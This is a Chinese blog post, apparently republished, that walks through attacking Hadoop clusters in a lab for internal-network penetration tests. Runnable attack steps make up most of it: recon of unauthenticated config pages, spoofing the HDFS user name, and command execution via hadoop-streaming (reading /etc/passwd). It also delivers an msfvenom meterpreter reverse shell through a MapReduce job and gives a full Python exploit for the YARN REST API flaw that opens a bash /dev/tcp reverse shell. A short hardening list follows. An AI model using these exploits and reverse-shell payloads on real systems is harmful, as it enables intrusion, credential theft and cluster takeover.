最近因为某些原因学习接触到了开源的大数据框架:
Hadoop
,该框架允许使用简单的编程模型跨计算机集群对大型数据集进行分布式处理。它旨在从单个服务器扩展到数千台机器,每台机器都提供本地计算和存储,详细概念知识背景我这就不介绍了,各位自行学习。
所以自己启发了这个大数据的框架是否有安全问题,毕竟
Hadoop
在大型企业是很常见的(之前参与某单位渗透测试也碰见过),可能有同学没见过,这是因为
Hadoop
一般在内网中部署,业务端口不对外的,估如果没进行到内网横向渗透阶段是比较难见到的。
本文技术含量可能不高,攻击手法等均非原创,写本文的出发点是自己遇到的时候百度相关漏洞,知识点过于零散且这块资料较少,所以本文进行了搜集整理,实现一些复现,让各位在内网渗透的过程中如果遇到以最少的时间成本、不需要深入了解
hadoop
即可实现攻击、拿到权限的目的。
Hadoop 是个生态圈,非单一软件,而是由 HDFS、YAERN、MapReduce、Zookeeper、Hbase 等组件提供支持。
环境准备及说明
hadoop 版本: 2.7.1(节点) 2.7.7(kali攻击机)
目前最新稳定版本已经为 3.2.1,在 3.x 系列下未试验过不保证均存在以下安全问题。
采取完全分布式模式部署
管理 Hadoop 的用户名:
hadoop
主机名 | Ip | 功能 |
---|---|---|
master | 192.168.1.200 | 主节点(管家角色、管理从节点) |
slave1 | 192.168.1.201 | 从节点1 |
kali | 192.168.1.8 | kali攻击机 |
设置 Hadoop 攻击环境
提前设置工作环境以执行某些特定的攻击
1、下载 Hadoop 安装包
wget https://mirrors.tuna.tsinghua.edu.cn/apache/hadoop/common/hadoop-2.7.7/hadoop-2.7.7.tar.gz
2、解压
tar xvf hadoop-2.7.7.tar.gz
3、设置
JAVA_HOME
环境变量
export JAVA_HOME=/usr/lib/jvm/java-7-openjdk-i386
4、(可选)将Hadoop的
bin
路径添加到PATH环境变量
export PATH=$PATH:/opt/hadoop-2.7.7/bin
5、测试
hadoop version
6、下载 Hadoop 攻击包(后续使用)
git clone https://github.com/wavestone-cdt/hadoop-attack-library.git
Hadoop 存在的安全问题汇总
1、信息收集
获取目标环境配置
必须在客户端 (kali) 的不同文件中配置几个集群参数,才能与 Hadoop 集群进行交互。
在内网中如何确定某台机器为
Hadoop
两种办法:
1、通过端口探测的方式
(nmap)
,
2、通过 http 访问某些业务端口确定
hadoop
1、在
Hadoop 攻击包 中存在
HadoopSnooper ,该脚本允许攻击者通过
Hadoop
组件的 Web 界面上公开的配置文件轻松检索合适的最小客户端配置。
我这边的话就不采取脚本的方式而是手工的方式(初次手工熟悉过程).
进入在
kali
中
hadoop
的配置目录:
<hadoop_installation>/etc/hadoop
2、手工访问
8088
或
50070、8042、16010
等端口查看 conf 配置,脚本就是爬取 hadoop 配置生成到本地,实现自动化。
hadoop 相关端口详情后面介绍,打开下面的链接:
http://192.168.1.200:50070/conf
我们先提取
fs.defaultFS
保存到本地
core-site.xml
文件内(conf 内存在大量 Hadoop 的配置信息,这边算是信息泄露一个点,无验证即可访问到。)
3、执行
hdfs
命令访问
hadoop
中
hdfs
hdfs 为 Hadoop 分布式文件系统 (HDFS), 简单理解: 该文件系统跟本地文件系统一样均可用来存放数据、文件,不同的是它是分布式,数据存在多台机器的本地系统上,也就是说 HDFS 还是需要依赖于本地文件系统。
查看 hdfs 文件系统的根目录,存在 3 个目录。
hdfs dfs -ls /
假设前面的
core-site.xml
未配置成功,访问 hdfs 根目录则会出现本地根目录.
Hadoop 部分重要服务端口
以下的端口都是我们渗透的过程中会遇到的
1、Hdfs 部分服务端口
端口 | 作用 | |
---|---|---|
9000 | fs.defaultFS,如:hdfs://172.25.40.171:9000 | |
50070 | dfs.namenode.http-address 监控状态http页面端口 |
这个
9000
端口的作用是前面我们把
hdfs://master:9000
写入了
core-site.xml
文件,让我们实现了访问
hdfs
,假设在之前的配置文件不写的话即可通过指定的方式访问
hdfs dfs -ls hdfs://master:9000/
50070
则是可以通过 http 页面查看 hdfs 状态。
http://192.168.1.200:50070/
这个 Live Nodes 比较重要能查看到当前集群存活的节点信息。
比较重要的还有
Utilities
,即可以浏览文件系统 (HDFS),和查看日志(可能留存敏感信息)
这边即是图形界面访问,之前我们是通过命令行方式
均可实现 download,在真实内网渗透中这时候你就可以扒扒看是否有你需要的数据。
文件所有者是
hadoop
,权限为
rwxr-xr-x
意味着可读不可写。突破实现写的问题我们后面展开。
2、yarn部分服务端口
端口 | 作用 |
---|---|
8088 | yarn.resourcemanager.webapp.address,YARN的http端口 |
http://192.168.1.200:8088/cluster/nodes
可以查看集群节点情况以及作业提交情况(后续攻击需要提交作业)
3、zookeeper 部分服务端口
端口 | 作用 |
---|---|
2181 | ZooKeeper,用来监听客户端的连接 |
zookeeper 属于 Hadoop 生态圈之一,存在未授权访问的问题
echo envi|nc 192.168.1.200 2181
可以存在部分敏感信息
连接 ZooKeeper 服务端
./zkCli.sh -server 192.168.1.200:2181
4、HBASE 部分服务端口
端口 | 作用 |
---|---|
16010 | hbase.master.info.port,HMaster的http端口 |
Hbase
是非关系型分布式数据库,访问是没权限校验的
如果是
hbase
集群内的节点执行
hbase shell
即可以增删改查
hbase
非集群节点使用
Java API
即可,网上有现成写好的方法实现操纵
2、浏览 HDFS 数据
浏览 HDFS 数据有两种不同的方法:
1、WebHDFS API
2、Hadoop CLI
WebHDFS
关于 WebHDFS 的访问方式前面简单提及了,就是通过访问
50070
端口的方式,但是默认是关闭,之前的页面只能 download,无法 put 等,需要通过
hdfs-site.xml
文件中的以下指令在群集端配置此功能的激活:
dfs.webhdfs.enabled: true
因为默认关闭,所以一般有业务需求才会开启,这边就不演示了,相关 REST API 语法自行查找。
Hadoop攻击包 中提供了一个
hdfsbrowser.py
脚本实现浏览的功能,主要是适应场景是无法进行 web 浏览访问,无 Hadoop 客户端的情况。
Hadoop CLI
hadoop fs 命令等同于 hdfs dfs hadoop fs -ls hdfs://master:9000/ 列出根路径的内容
hadoop fs -put core-site.xml hdfs://master:9000/user/hadoop/wcout/
上传文件被拒绝,由于攻击机
kali
当前用户为
umask
,不具备上传权限。
实现突破的方式
1、修改环境变量:
export HADOOP_USER_NAME=hadoop
因为脚本在获取用户名的时候就是采取读环境变量的方法,这边直接篡改掉。
2、创建一个与 hdfs 具备权限的同名用户去访问(不推荐,在某些情况下(依托跳板机)可能不具备创建用户等权限,且徒增账号增加危险性)
3、如果采用
JAVA API
的方式进行
hdfs
操作可以在代码中设置:
System.setProperty("HADOOP_USER_NAME","hadoop");
或者传参的方式
java -D HADOOP_USER_NAME=root
Hadoop API文档:
https://hadoop.apache.org/docs/stable/api/index.html
3、免密登录
在分布式架构下因为需要
master
节点要启动 Hadoop 每个进程 (datanode, namenode 等这些进程),都需要手动输入启动进程所在的机器(集群节点)的用户密码。以及在关闭时,也是需要手动输入密码,这样过于繁琐。所以一般都会配置集群机器之间使用秘钥登录,这样就无需手动输入密码了。
这就暴露出一个问题,假设拿到了集群中
master
节点的用户权限 (shell),那它可以通过免密登录到集群中任何一台节点,意味着整个集群沦陷。
官方配置文档把配置免密 ssh 作为配置 hadoop 的前提条件,且几乎国内所有的配置教程也采用免密 ssh
1、我先把
master
与
slave1
之间
ssh
密钥登录去掉,然后启动
hadoop
相关业务.从图中可以看大在去掉密钥的情况下我输入了2次密码,分别是
master
和
slave1
,假设集群数量为上百上千,光输密码这个工作量就是很大的。
2、
master
节点上生成公钥分发到所需的节点上,启动 hadoop 服务未出现要密码,实际中则可利用这一点来登录到任意节点上
但这边就会出现 1 个问题,
master
是可以无密码登录任意节点,但是任意节点无法无密钥访问到其他节点乃至
master
但是我网上查看了些搭建
Hadoop
集群的教程,发现有些教程密钥登录这一步骤给的操作最终是可以实现集群任意节点间登录的,所以这个情况需要看实际中运维人员怎么部署的。
所以拿到 shell 后可以看下
authorized_keys
文件内是什么情况
发现所有节点ip信息可以利用以下方式:
hosts 文件 /一般写一个模板然后分发到所有节点
内部 DNS
50070 端口上的 Live Nodes
ip 可能连续 /例如 192.168.1.200 201 202
4、执行远程命令
通过访问之前的
http://192.168.1.200:50070/conf
页面获取到如下
name
的
value
信息并且应用到
kali
本地
hadoop
客户端。(如果部分信息如可尝试更换端口)
1、hdfs-site.xml
<configuration>
<property>
<name>dfs.namenode.secondary.http-address</name>
<value>master:50090</value>
</property>
</configuration>
2、core-site.xml
<configuration>
<property>
<name>fs.defaultFS</name>
<value>hdfs://master:9000</value>
</property>
</configuration>
3、yarn-site.xml
<configuration>
<property>
<name>yarn.resourcemanager.hostname</name>
<value>master</value>
</property>
</configuration>
4、mapred-site.xml
<configuration>
<property>
<name>mapreduce.framework.name</name>
<value>yarn</value>
</property>
<property>
<name>mapreduce.jobhistory.address</name>
<value>master:10020</value>
</property>
<property>
<name>mapreduce.jobhistory.webapp.address</name>
<value>master:19888</value>
</property>
</configuration>
执行单个命令
例如执行命令
cat /etc/passwd
hadoop jar share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar --input /user/hadoop/wcout/README.txt -output /user/hadoop/outcommand -mapper "/bin/cat /etc/passwd" -reducer NONE
解释:
hadoop-streaming-2.7.7.jar:
http://hadoop.apache.org/docs/r1.0.4/cn/streaming.html
-input:这将作为要执行的命令的 MapReduce 的输入提供,仅在该文件中至少放置一个字符,此文件对我们的目标无用
-output:MapReduce 将使用此目录写入结果,_SUCCESS 否则将失败
-mapper:要执行的命令,例如 "/bin/cat /etc/passwd"。输出结果将写入 -output 目录
-reducer NONE:不需要 reduce 执行单个命令,映射器就足够了
检测 output 情况:命令执行完出现如下字眼说明执行成功。
hadoop fs -cat hdfs://master:9000/user/hadoop/outcommand/part-00000
成功执行命令且写入进 output 目录
获取 meterpreter
上述执行单个命令的方式,每次只能执行一次写入一次,不够灵活存在局限性,下面采取反弹得到 meterpreter 的方式。
1、生成 payload
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.8 -f elf -o msf.payload
2、put payload 到 hdfs (不带目录即默认目录 /user/hadoop)
hadoop fs -put msf.payload
3、msf 监听
4、执行反弹
hadoop jar share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar --input /user/hadoop/wcout/README.txt -output /user/hadoop/outcommand5 -mapper "./msf.payload" -file "./msf.payload" -background
-file /本地的 meterpreter 可执行文件上传到 HDFS 上的路径
-mapper
/可执行的 meterpreter 的 HDFS 路径
-background
/后台运行
5、msf 成功建立连接
这边可以看到得到的 shell 是
slave1
的,这是因为
MapReduce
作业的分布式性质,随机落到某个集群节点,这边的
payload
需要使用
reverse shell
反弹的,因为如果采用正向连接,假设集群节点众多,你可能不知道要连接到哪个 ip.
假设落到 slave 上但是我需要 master 权限,只要 ssh 免密过去就好了。关于这个问题前面也提及了。
5、Hadoop Yarn REST API 未授权漏洞利用
YARN 是 hadoop 系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把 MapReduce 计算框架作为一个应用程序运行在 YARN 系统之上,通过 YARN 来管理资源。简单的说,用户可以向 YARN 提交特定应用程序进行执行,其中就允许执行相关包含系统命令。
yarn 默认 8088 端口
1、检测漏洞存在方式:
curl -X POST 192.168.1.200:8088/ws/v1/cluster/apps/new-application
2、漏洞利用 python 代码:
import requests
target = 'http://192.168.1.200:8088/'
lhost = '192.168.1.8' # put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
print(resp.text)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
print (data)
requests.post(url, json=data)
3、nc 监听 9999 端口得到 shell
4、msf 也提供了漏洞模块,这边就不演示了。
msf5 > use exploit/linux/http/hadoop_unauth_exec
这边提供一个 vulhub 的关于 Yarn REST API 未授权漏洞利用的靶场链接,各位可自行测试,就无需搭建 Hadoop 环境了。
https://vulhub.org/#/environments/hadoop/unauthorized-yarn/
6. 暂定
Hadoop 作为一个生态圈存在,存在的安全问题自然很多。
这边算是先暂定为 1.0 版本,后续陆续更新增加丰富。
安全加固
攻破 Hadoop 集群并不是非常难。这主要是因为默认安全机制的不严格,以及生态环境的复杂性而导致的。不仅如此,各大发行版也存在许多传统漏洞。
1、开启 kerberos 认证,参考:
http://hadoop.apache.org/docs/r2.7.3/hadoop-auth/Configuration.html
2、敏感页面以及目录最好也不要对普通用户开放,可 nginx 方向代理、iptables 解决。
(jmx/logs/cluster/status.jsp/)
3、hadoop 集群单独部署 做好安全监控发现被攻击迹象及时高警
4、避免让服务在公网中暴露
5、不要在边缘节点布置应用
6、更新软件版本
参考
挖掘分布式系统——Hadoop 的漏洞
https://zhuanlan.zhihu.com/p/28901633
Hadoop 攻击库
https://github.com/wavestone-cdt/hadoop-attack-library
Hadoop Yarn REST API 未授权漏洞利用挖矿分析
https://www.freebuf.com/vuls/173638.html
Hadoop Yarn REST API 未授权漏洞利用
https://www.cnblogs.com/junsec/p/11390634.html
Hadoop safari : Hunting for vulnerabilities
http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf
Hadoop 安全问题介绍以及安全加固
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。